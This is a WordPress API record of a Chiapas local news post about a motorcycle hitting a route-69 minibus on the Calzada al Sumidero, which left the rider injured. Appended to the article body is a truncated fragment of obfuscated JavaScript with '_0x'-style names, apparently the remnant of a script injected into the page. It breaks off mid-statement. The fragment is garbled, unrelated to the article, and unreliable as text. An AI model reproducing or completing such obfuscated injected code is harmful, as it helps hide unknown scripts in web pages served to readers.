{"id":14046,"date":"2024-02-08T04:37:20","date_gmt":"2024-02-08T04:37:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14046"},"modified":"2024-02-08T04:37:25","modified_gmt":"2024-02-08T04:37:25","slug":"motociclista-se-estrello-contra-un-colectivo-en-la-calzada-al-sumidero","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14046","title":{"rendered":"Motociclista se estrell\u00f3 contra un colectivo en la Calzada al Sumidero"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707367011527-768x1024.jpg\" alt=\"\" class=\"wp-image-14047\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707367011527-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707367011527-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707367011527.jpg 960w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 7 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un motociclista se estrell\u00f3 contra un colectivo de la ruta 69 en la Calzada al Sumidero este mi\u00e9rcoles por la tarde dejando un saldo de un lesionado y da\u00f1os materiales.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, la unidad Nissan Urvan de la ruta 69 y n\u00famero econ\u00f3mico 08 y el conductor de una moto Bajaj de color negro colisionaron a la altura del kil\u00f3metro 3, frente a la Colonia Cruz con Casitas.<\/p>\n\n\n\n<p>En el lugar el motociclista dio a conocer que, el motociclista relat\u00f3 que, la Urvan se par\u00f3 a media calle por lo que no pudo esquivarlo al ir conduciendo y se estrell\u00f3 contra la parte trasera.<\/p>\n\n\n\n<p>En su defensa el colectivero inform\u00f3 que, la parada oficial estaba ocupada por otra unidad y tuvo que detenerse para detenerse en ese punto.<\/p>\n\n\n\n<p>Por el golpe el motociclista result\u00f3 con diferentes lesiones pero no fue necesario trasladarlo a un nosocomio.<\/p>\n\n\n\n<p>En el lugar los involucrados llegaron a un acuerdo armonioso y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 7 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un motociclista se estrell\u00f3 contra un colectivo de la ruta 69 en la Calzada al Sumidero este mi\u00e9rcoles por la tarde dejando un saldo de un lesionado y da\u00f1os materiales. Los reportes oficiales informaron que, la unidad Nissan Urvan de la ruta 69 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14047,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14046","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14046","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14046"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14046\/revisions"}],"predecessor-version":[{"id":14048,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14046\/revisions\/14048"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14047"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14046"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14046"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14046"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}